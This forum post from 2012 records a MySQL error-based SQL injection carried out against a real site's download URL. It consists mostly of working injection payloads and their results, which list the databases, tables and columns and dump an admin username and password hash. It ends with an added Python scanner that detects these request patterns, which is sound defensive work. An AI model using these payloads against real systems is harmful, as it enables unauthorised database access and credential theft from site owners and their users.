China Network Penetration Testing Alliance

Title: php+mysql advanced error-based injection, tested and confirmed working

Author: admin    Time: 2012-9-13 17:52
http://www.wooyun.org/bugs/wooyun-2010-01666
I had been looking for something to test this on and didn't expect to find it here; it can be tested, and this is just a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********Enumerate database names one at a time by stepping limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********Enumerate table names one at a time by stepping limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********Enumerate column names one at a time by stepping limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361

/**********Dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
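
Added example, not part of the original post: every request recorded above shares one fingerprint (a quote followed by and/or, a nested select, count(*),concat(...), floor(rand(0)*2), group by, and information_schema), and it sits in a path segment rather than the query string. The Python below URL-decodes each request target in an access log and flags lines that match two or more of those traits; the log lines, client addresses, signature names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Traits shared by the requests in this post, matched after URL decoding.
SIGNATURES = {
    "rand_group_by": re.compile(r"floor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b", re.I | re.S),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "quote_then_bool": re.compile(r"'\s*(?:and|or)\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(target):
    """Decode %XX and '+' up to three times so encoded forms match too."""
    prev = None
    for _ in range(3):
        if target == prev:
            break
        prev, target = target, unquote_plus(target)
    return target

def classify(target):
    """Return the sorted names of signatures found in the whole target, path included."""
    text = normalize(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(lines, threshold=2):
    """Return (line_number, matched_signatures) for lines at or above the threshold."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            matched = classify(m.group(1))
            if len(matched) >= threshold:
                hits.append((n, matched))
    return hits

# Constructed access-log lines (documentation IP range); 2 and 4 reuse the post's request shape.
SAMPLE_LOG = """
192.0.2.10 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 5120
192.0.2.77 - - [13/Sep/2012:17:41:12 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1" 500 312
192.0.2.10 - - [13/Sep/2012:17:42:30 +0800] "GET /docs/information_schema.tables.html HTTP/1.1" 200 2048
192.0.2.77 - - [13/Sep/2012:17:43:05 +0800] "GET /download/downpage/netarea/id/1600003%27+and+%28select+1+from%28select+count%28*%29,concat%280x7c,%28select+user%28%29%29,0x7c,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003 HTTP/1.1" 500 312
""".strip().splitlines()

if __name__ == "__main__":
    for lineno, names in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(names)}")
```

The threshold of two keeps a single incidental match, such as a documentation URL that mentions information_schema, from raising an alert.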